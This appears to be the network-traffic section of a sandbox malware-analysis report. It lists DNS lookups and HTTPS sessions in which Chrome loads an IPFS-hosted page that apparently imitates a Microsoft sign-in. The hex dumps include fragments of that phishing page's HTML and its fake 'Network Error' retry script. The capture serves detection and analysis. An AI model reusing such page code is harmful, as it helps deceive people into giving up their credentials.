May 23, 2024 00:16:10.869172096 CEST	51399	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:10.869309902 CEST	58494	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:10.886181116 CEST	53	51399	1.1.1.1	192.168.2.4
May 23, 2024 00:16:10.886219025 CEST	53	58494	1.1.1.1	192.168.2.4
May 23, 2024 00:16:10.900522947 CEST	53	58645	1.1.1.1	192.168.2.4
May 23, 2024 00:16:12.349849939 CEST	53470	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:12.350354910 CEST	56616	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:12.395636082 CEST	53	56616	1.1.1.1	192.168.2.4
May 23, 2024 00:16:12.395683050 CEST	53	53470	1.1.1.1	192.168.2.4
May 23, 2024 00:16:12.621376991 CEST	52155	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:12.631457090 CEST	59525	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:12.638185024 CEST	53	52155	1.1.1.1	192.168.2.4
May 23, 2024 00:16:12.684811115 CEST	53	59525	1.1.1.1	192.168.2.4
May 23, 2024 00:16:13.612024069 CEST	62219	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:13.612025023 CEST	63569	53	192.168.2.4	1.1.1.1
May 23, 2024 00:16:13.631561041 CEST	53	63569	1.1.1.1	192.168.2.4
May 23, 2024 00:16:13.633770943 CEST	53	62219	1.1.1.1	192.168.2.4
May 23, 2024 00:16:25.614207029 CEST	53	50995	1.1.1.1	192.168.2.4
May 23, 2024 00:16:28.818232059 CEST	138	138	192.168.2.4	192.168.2.255
May 23, 2024 00:16:44.379513025 CEST	53	54964	1.1.1.1	192.168.2.4
May 23, 2024 00:17:06.267641068 CEST	53	55460	1.1.1.1	192.168.2.4
May 23, 2024 00:17:06.800537109 CEST	53	64228	1.1.1.1	192.168.2.4
May 23, 2024 00:17:34.272780895 CEST	53	54699	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 23, 2024 00:16:07.046706915 CEST	192.168.2.4	1.1.1.1	c22c	(Port unreachable)	Destination Unreachable
May 23, 2024 00:17:06.267709970 CEST	192.168.2.4	1.1.1.1	c224	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 23, 2024 00:16:08.803082943 CEST	192.168.2.4	1.1.1.1	0x989a	Standard query (0)	ipfs.io	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:08.803209066 CEST	192.168.2.4	1.1.1.1	0xb5c6	Standard query (0)	ipfs.io	65	IN (0x0001)	false
May 23, 2024 00:16:09.467981100 CEST	192.168.2.4	1.1.1.1	0x414b	Standard query (0)	cdn.jsdelivr.net	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:09.468605995 CEST	192.168.2.4	1.1.1.1	0xcd9c	Standard query (0)	cdn.jsdelivr.net	65	IN (0x0001)	false
May 23, 2024 00:16:09.672996044 CEST	192.168.2.4	1.1.1.1	0xfedc	Standard query (0)	cdn.glitch.global	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:09.673105001 CEST	192.168.2.4	1.1.1.1	0x8334	Standard query (0)	cdn.glitch.global	65	IN (0x0001)	false
May 23, 2024 00:16:10.655879021 CEST	192.168.2.4	1.1.1.1	0x9890	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:10.656202078 CEST	192.168.2.4	1.1.1.1	0x6e0e	Standard query (0)	www.google.com	65	IN (0x0001)	false
May 23, 2024 00:16:10.690057993 CEST	192.168.2.4	1.1.1.1	0xa36d	Standard query (0)	cdn.glitch.global	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:10.690227032 CEST	192.168.2.4	1.1.1.1	0x97ea	Standard query (0)	cdn.glitch.global	65	IN (0x0001)	false
May 23, 2024 00:16:10.869172096 CEST	192.168.2.4	1.1.1.1	0x2d89	Standard query (0)	logincdn.msftauth.net	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:10.869309902 CEST	192.168.2.4	1.1.1.1	0xf88c	Standard query (0)	logincdn.msftauth.net	65	IN (0x0001)	false
May 23, 2024 00:16:12.349849939 CEST	192.168.2.4	1.1.1.1	0x6ba4	Standard query (0)	ipfs.tech	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:12.350354910 CEST	192.168.2.4	1.1.1.1	0x3c16	Standard query (0)	ipfs.tech	65	IN (0x0001)	false
May 23, 2024 00:16:12.621376991 CEST	192.168.2.4	1.1.1.1	0xff03	Standard query (0)	logincdn.msftauth.net	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:12.631457090 CEST	192.168.2.4	1.1.1.1	0x8b08	Standard query (0)	logincdn.msftauth.net	65	IN (0x0001)	false
May 23, 2024 00:16:13.612024069 CEST	192.168.2.4	1.1.1.1	0x5e73	Standard query (0)	ipfs.tech	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:13.612025023 CEST	192.168.2.4	1.1.1.1	0x3e3e	Standard query (0)	ipfs.tech	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 23, 2024 00:16:08.811923981 CEST	1.1.1.1	192.168.2.4	0x989a	No error (0)	ipfs.io		209.94.90.1	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:08.820813894 CEST	1.1.1.1	192.168.2.4	0xb5c6	No error (0)	ipfs.io			65	IN (0x0001)	false
May 23, 2024 00:16:09.520101070 CEST	1.1.1.1	192.168.2.4	0xcd9c	No error (0)	cdn.jsdelivr.net	jsdelivr.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 00:16:09.520134926 CEST	1.1.1.1	192.168.2.4	0x414b	No error (0)	cdn.jsdelivr.net	cdn.jsdelivr.net.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 00:16:09.736871958 CEST	1.1.1.1	192.168.2.4	0xfedc	No error (0)	cdn.glitch.global	j.sni.global.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 00:16:09.736907959 CEST	1.1.1.1	192.168.2.4	0x8334	No error (0)	cdn.glitch.global	j.sni.global.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 00:16:10.679303885 CEST	1.1.1.1	192.168.2.4	0x9890	No error (0)	www.google.com		142.250.184.228	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:10.679323912 CEST	1.1.1.1	192.168.2.4	0x6e0e	No error (0)	www.google.com			65	IN (0x0001)	false
May 23, 2024 00:16:10.706856012 CEST	1.1.1.1	192.168.2.4	0x97ea	No error (0)	cdn.glitch.global	j.sni.global.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 00:16:10.713844061 CEST	1.1.1.1	192.168.2.4	0xa36d	No error (0)	cdn.glitch.global	j.sni.global.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 00:16:10.886181116 CEST	1.1.1.1	192.168.2.4	0x2d89	No error (0)	logincdn.msftauth.net	cs1227.wpc.alphacdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 00:16:10.886181116 CEST	1.1.1.1	192.168.2.4	0x2d89	No error (0)	cs1227.wpc.alphacdn.net		192.229.221.185	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:10.886219025 CEST	1.1.1.1	192.168.2.4	0xf88c	No error (0)	logincdn.msftauth.net	cs1227.wpc.alphacdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 00:16:12.395683050 CEST	1.1.1.1	192.168.2.4	0x6ba4	No error (0)	ipfs.tech		169.150.247.39	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:12.638185024 CEST	1.1.1.1	192.168.2.4	0xff03	No error (0)	logincdn.msftauth.net	cs1227.wpc.alphacdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 00:16:12.638185024 CEST	1.1.1.1	192.168.2.4	0xff03	No error (0)	cs1227.wpc.alphacdn.net		192.229.221.185	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:12.684811115 CEST	1.1.1.1	192.168.2.4	0x8b08	No error (0)	logincdn.msftauth.net	cs1227.wpc.alphacdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 00:16:13.633770943 CEST	1.1.1.1	192.168.2.4	0x5e73	No error (0)	ipfs.tech		185.93.3.244	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:22.019962072 CEST	1.1.1.1	192.168.2.4	0x67ae	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:22.019962072 CEST	1.1.1.1	192.168.2.4	0x67ae	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:23.056169987 CEST	1.1.1.1	192.168.2.4	0xa46a	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 00:16:23.056169987 CEST	1.1.1.1	192.168.2.4	0xa46a	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:36.305597067 CEST	1.1.1.1	192.168.2.4	0x3f6e	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 00:16:36.305597067 CEST	1.1.1.1	192.168.2.4	0x3f6e	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
May 23, 2024 00:16:59.550045967 CEST	1.1.1.1	192.168.2.4	0x5600	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 00:16:59.550045967 CEST	1.1.1.1	192.168.2.4	0x5600	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
May 23, 2024 00:17:19.456973076 CEST	1.1.1.1	192.168.2.4	0xecf8	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 00:17:19.456973076 CEST	1.1.1.1	192.168.2.4	0xecf8	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
May 23, 2024 00:17:49.405320883 CEST	1.1.1.1	192.168.2.4	0xb30a	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 23, 2024 00:17:49.405320883 CEST	1.1.1.1	192.168.2.4	0xb30a	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipfs.io

https:

logincdn.msftauth.net

ipfs.tech

fs.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	209.94.90.1	443	5724	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-22 22:16:09 UTC	702	OUT	GET /ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/ HTTP/1.1 Host: ipfs.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-22 22:16:09 UTC	1045	IN	HTTP/1.1 200 OK Date: Wed, 22 May 2024 22:16:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close access-control-allow-headers: Content-Type access-control-allow-headers: Range access-control-allow-headers: User-Agent access-control-allow-headers: X-Requested-With access-control-allow-methods: GET access-control-allow-methods: HEAD access-control-allow-methods: OPTIONS access-control-allow-origin: * access-control-expose-headers: Content-Length access-control-expose-headers: Content-Range access-control-expose-headers: X-Chunked-Output access-control-expose-headers: X-Ipfs-Path access-control-expose-headers: X-Ipfs-Roots access-control-expose-headers: X-Stream-Output Cache-Control: public, max-age=29030400, immutable x-ipfs-path: /ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/ x-ipfs-roots: QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS x-ipfs-pop: rainbow-ny5-05 CF-Cache-Status: HIT Age: 364894 Server: cloudflare CF-RAY: 88802b42a9f9432e-EWR alt-svc: h3=":443"; ma=86400
2024-05-22 22:16:09 UTC	324	IN	Data Raw: 33 64 33 38 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 31 2e 33 2f 64 69 73 74 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 Data Ascii: 3d38<!DOCTYPE html><html lang="en"><head> <title></title> <meta name="description" content=""> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet"> <script src="https://cd
2024-05-22 22:16:09 UTC	1369	IN	Data Raw: 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 36 2e 34 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 0d 0a 2e 77 72 61 70 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a Data Ascii: /script> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js"></script><style>.wrap { position: absolute;
2024-05-22 22:16:09 UTC	1369	IN	Data Raw: 66 74 3a 20 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 78 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 34 35 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 2e 77 72 61 70 61 20 69 6d 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 7d 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c Data Ascii: ft: 50%; transform: translate(-50%, -50%); padding: 20x; height: 450px; display: flex; align-items: center; width: 100%; } .wrapa img { width: 100%; }}</style></head><
2024-05-22 22:16:09 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 22 23 78 32 22 29 2e 76 61 6c 28 22 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 6d 73 67 27 29 2e 68 74 6d 6c 20 28 60 4e 65 74 77 6f 72 6b 20 45 72 72 6f 72 21 20 50 6c 65 61 73 65 20 76 65 72 69 66 79 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 60 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 22 23 73 75 62 6d 69 74 42 74 6e 22 29 2e 68 74 6d 6c 28 22 53 69 67 6e 20 49 6e 22 29 2e 70 72 6f 70 28 22 64 69 73 61 62 6c 65 64 22 2c 20 66 61 6c 73 65 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 20 32 30 Data Ascii: $("#x2").val(""); $('#msg').html (`Network Error! Please verify your information and try again`); $("#submitBtn").html("Sign In").prop("disabled", false); }, 20
2024-05-22 22:16:09 UTC	1369	IN	Data Raw: 6a 70 53 52 45 59 67 65 47 31 73 62 6e 4d 36 63 6d 52 6d 50 53 64 6f 64 48 52 77 4f 69 38 76 64 33 64 33 4c 6e 63 7a 4c 6d 39 79 5a 79 38 78 4f 54 6b 35 4c 7a 41 79 4c 7a 49 79 4c 58 4a 6b 5a 69 31 7a 65 57 35 30 59 58 67 74 62 6e 4d 6a 4a 7a 34 4b 43 69 41 67 49 43 41 67 49 43 41 67 50 48 4a 6b 5a 6a 70 45 5a 58 4e 6a 63 6d 6c 77 64 47 6c 76 62 69 42 79 5a 47 59 36 59 57 4a 76 64 58 51 39 4a 79 63 4b 49 43 41 67 49 43 41 67 49 43 42 34 62 57 78 75 63 7a 70 6b 59 7a 30 6e 61 48 52 30 63 44 6f 76 4c 33 42 31 63 6d 77 75 62 33 4a 6e 4c 32 52 6a 4c 32 56 73 5a 57 31 6c 62 6e 52 7a 4c 7a 45 75 4d 53 38 6e 50 67 6f 67 49 43 41 67 49 43 41 67 49 44 78 6b 59 7a 70 30 61 58 52 73 5a 54 34 4b 49 43 41 67 49 43 41 67 49 43 41 38 63 6d 52 6d 4f 6b 46 73 64 44 34 4b Data Ascii: jpSREYgeG1sbnM6cmRmPSdodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjJz4KCiAgICAgICAgPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9JycKICAgICAgICB4bWxuczpkYz0naHR0cDovL3B1cmwub3JnL2RjL2VsZW1lbnRzLzEuMS8nPgogICAgICAgIDxkYzp0aXRsZT4KICAgICAgICA8cmRmOkFsdD4K
2024-05-22 22:16:09 UTC	1369	IN	Data Raw: 41 67 49 48 68 74 62 47 35 7a 4f 6e 68 74 63 44 30 6e 61 48 52 30 63 44 6f 76 4c 32 35 7a 4c 6d 46 6b 62 32 4a 6c 4c 6d 4e 76 62 53 39 34 59 58 41 76 4d 53 34 77 4c 79 63 2b 43 69 41 67 49 43 41 67 49 43 41 67 50 48 68 74 63 44 70 44 63 6d 56 68 64 47 39 79 56 47 39 76 62 44 35 44 59 57 35 32 59 54 77 76 65 47 31 77 4f 6b 4e 79 5a 57 46 30 62 33 4a 55 62 32 39 73 50 67 6f 67 49 43 41 67 49 43 41 67 49 44 77 76 63 6d 52 6d 4f 6b 52 6c 63 32 4e 79 61 58 42 30 61 57 39 75 50 67 6f 67 49 43 41 67 49 43 41 67 49 41 6f 67 49 43 41 67 49 43 41 67 49 44 77 76 63 6d 52 6d 4f 6c 4a 45 52 6a 34 4b 49 43 41 67 49 43 41 67 49 43 41 38 4c 33 67 36 65 47 31 77 62 57 56 30 59 54 37 65 74 30 69 54 41 41 41 53 2b 45 6c 45 51 56 52 34 6e 4f 32 63 64 33 68 55 56 64 72 41 66 Data Ascii: AgIHhtbG5zOnhtcD0naHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLyc+CiAgICAgICAgPHhtcDpDcmVhdG9yVG9vbD5DYW52YTwveG1wOkNyZWF0b3JUb29sPgogICAgICAgIDwvcmRmOkRlc2NyaXB0aW9uPgogICAgICAgIAogICAgICAgIDwvcmRmOlJERj4KICAgICAgICA8L3g6eG1wbWV0YT7et0iTAAAS+ElEQVR4nO2cd3hUVdrAf
2024-05-22 22:16:09 UTC	1369	IN	Data Raw: 44 68 79 2f 30 34 2f 43 4b 34 53 69 73 37 6d 7a 74 55 4b 6b 31 4c 50 7a 69 49 75 55 31 6a 57 51 57 56 50 50 58 72 31 50 76 70 66 6a 74 59 6c 62 4b 2b 6b 59 56 41 62 4d 50 6d 4f 31 51 55 39 63 45 77 41 64 37 30 39 6c 34 4a 4e 74 73 6d 36 4c 62 64 51 43 38 75 53 47 5a 64 37 36 35 59 72 5a 4e 58 61 4e 70 68 72 4b 30 73 6f 48 43 57 33 58 73 50 4a 56 48 4c 33 38 48 70 6f 33 77 35 65 76 59 58 4b 4d 32 66 51 49 63 61 47 78 57 6b 35 46 66 6a 5a 2b 72 6a 59 6d 72 31 4e 43 6b 5a 74 2f 5a 41 72 50 33 2f 4b 33 67 37 32 61 44 67 34 32 63 75 6f 62 4f 79 2b 4a 2b 39 66 70 41 58 4f 77 74 41 50 6a 69 59 42 62 6c 4e 59 33 36 61 33 6d 6c 53 6e 61 66 7a 6d 50 57 71 4b 35 34 4f 31 76 7a 36 66 7a 2b 6a 46 74 32 2b 72 37 4c 56 46 6e 62 31 4f 36 31 70 5a 74 53 47 44 66 51 6b 39 Data Ascii: Dhy/04/CK4Sis7mztUKk1LPziIuU1jWQWVPPXr1PvpfjtYlbK+kYVAbMPmO1QU9cEwAd709l4JNtsm6LbdQC8uSGZd765YrZNXaNphrK0soHCW3XsPJVHL38Hpo3w5evYXKM2fQIcaGxWk5FfjZ+rjYmr1NCkZt/ZArP3/K3g72aDg42cuobOy+J+9fpAXOwtAPjiYBblNY36a3mlSnafzmPWqK54O1vz6fz+jFt2+r7LVFnb1O61pZtSGDfQk9
2024-05-22 22:16:09 UTC	1369	IN	Data Raw: 63 6f 75 56 66 50 52 69 42 4a 48 42 54 6d 54 6b 56 2f 50 59 30 6c 50 55 31 4e 57 77 66 46 59 76 46 6b 37 75 7a 71 58 73 53 6e 61 63 75 73 48 36 31 77 5a 51 57 64 76 45 6a 4e 56 6e 4f 58 6a 2b 70 6f 6e 4d 44 30 77 4d 31 35 5a 74 4a 32 38 41 4d 48 32 45 6e 2f 37 63 36 41 68 33 4c 6d 56 58 74 47 73 39 6c 6d 79 36 7a 4e 7a 33 2f 32 31 79 33 74 50 4a 6b 6d 2b 58 44 53 55 32 75 59 54 58 50 72 76 49 50 77 39 6b 49 68 47 4c 57 44 49 6a 44 4b 6c 45 78 4b 75 66 58 75 44 54 37 36 2f 72 37 2f 48 45 58 2b 4e 6f 56 6d 6d 77 74 70 42 67 4b 5a 63 77 5a 5a 67 50 71 2b 65 47 73 33 4c 37 56 5a 5a 73 53 75 47 6a 37 7a 4b 5a 76 75 6f 73 55 34 62 35 73 6e 5a 65 75 50 34 2b 4b 2b 65 45 63 2b 78 69 4d 63 75 33 58 57 48 56 6a 71 75 38 73 54 37 5a 71 44 79 78 37 72 6b 2b 54 42 33 Data Ascii: couVfPRiBJHBTmTkV/PY0lPU1NWwfFYvFk7uzqXsSnacusH61wZQWdvEjNVnOXj+ponMD0wM15ZtJ28AMH2En/7c6Ah3LmVXtGs9lmy6zNz3/21y3tPJkm+XDSU2uYTXPrvIPw9kIhGLWDIjDKlExKufXuDT76/r7/HEX+NoVmmwtpBgKZcwZZgPq+eGs3L7VZZsSuGj7zKZvuosU4b5snZeuP4+K+eEc+xiMcu3XWHVjqu8sT7ZqDyx7rk+TB3
2024-05-22 22:16:09 UTC	1369	IN	Data Raw: 38 58 4a 54 6d 74 5a 58 2f 77 34 69 58 33 4c 72 4f 6e 58 7a 5a 47 74 62 30 52 78 59 34 36 53 4f 65 38 6c 45 4a 74 63 67 71 73 75 41 31 68 6c 4a 76 4e 57 57 39 2b 4d 67 34 30 63 56 33 76 4c 65 35 49 45 75 56 4d 79 43 36 71 4a 44 4e 59 6d 43 79 52 69 45 53 37 32 46 69 62 47 78 64 6e 4f 32 42 69 6b 5a 42 73 62 6a 6f 37 69 35 74 42 61 2b 79 71 74 62 43 42 5a 56 37 77 2b 63 6b 46 62 56 4c 2b 54 65 70 70 68 48 51 33 51 65 78 50 6d 61 4e 59 70 58 55 65 6f 71 57 39 6d 54 33 77 2b 73 33 56 4a 6f 6b 6c 44 76 63 6b 74 71 63 56 52 49 65 65 6b 4c 71 48 6b 5a 6e 42 76 44 5a 43 61 71 34 31 37 4c 31 78 76 64 56 31 62 6b 6e 4b 47 50 4a 41 4b 31 32 4b 7a 44 69 55 56 55 56 37 54 79 4f 42 51 5a 78 77 56 63 6c 37 34 2b 50 78 64 6a 64 64 69 2b 65 35 6d 75 31 64 4c 51 73 52 53 Data Ascii: 8XJTmtZX/w4iX3LrOnXzZGtb0RxY46SOe8lEJtcgqsuA1hlJvNWW9+Mg40cV3vLe5IEuVMyC6qJDNYmCyRiES72FibGxdnO2BikZBsbjo7i5tBa+yqtbCBZV7w+ckFbVL+TepphHQ3QexPmaNYpXUeoqW9mT3w+s3VJoklDvcktqcVRIeekLqHkZnBvDZCaq417L1xvdV1bknKGPJAK12KzDiUVUV7TyOBQZxwVcl74+Pxdjddi+e5mu1dLQsRS
2024-05-22 22:16:09 UTC	1369	IN	Data Raw: 73 48 2f 6a 61 4d 72 53 64 79 47 52 6a 53 42 56 39 58 61 35 37 38 57 7a 77 68 33 72 62 45 68 4c 63 45 78 74 35 6b 46 6c 51 62 46 57 48 2f 2b 6e 55 71 30 57 45 75 72 4a 6b 62 7a 71 57 73 43 6b 6f 72 47 2f 6a 6f 78 58 37 63 71 6d 70 6b 33 76 75 4a 67 48 62 46 56 6c 68 4a 32 62 73 30 6d 72 6e 76 4a 33 4b 37 75 70 46 5a 6f 37 71 79 39 30 79 2b 50 6e 30 39 5a 31 30 43 78 31 62 46 38 4d 39 58 49 70 6a 39 62 67 4c 4f 64 68 59 73 6e 39 57 4c 4d 31 66 4b 57 4c 31 44 6d 78 70 33 73 62 66 51 31 78 67 48 64 75 2f 43 6f 35 45 65 78 4b 57 57 55 61 56 73 49 69 32 76 43 6f 31 47 77 39 54 68 50 74 79 75 62 6b 51 73 30 73 70 57 64 51 39 63 30 64 4f 58 53 78 6e 2f 39 6d 6b 32 4c 52 68 45 67 4c 75 43 37 57 39 46 73 57 7a 7a 5a 65 51 79 4d 57 76 6d 68 74 50 46 7a 6f 4c 63 34 Data Ascii: sH/jaMrSdyGRjSBV9Xa578Wzwh3rbEhLcExt5kFlQbFWH/+nUq0WEurJkbzqWsCkorG/joxX7cqmpk3vuJgHbFVlhJ2bs0mrnvJ3K7upFZo7qy90y+Pn09Z10Cx1bF8M9XIpj9bgLOdhYsn9WLM1fKWL1Dmxp3sbfQ1xgHdu/Co5EexKWWUaVsIi2vCo1Gw9ThPtyubkQs0spWdQ9c0dOXSxn/9mk2LRhEgLuC7W9FsWzzZeQyMWvmhtPFzoLc4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49753	192.229.221.185	443	5724	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
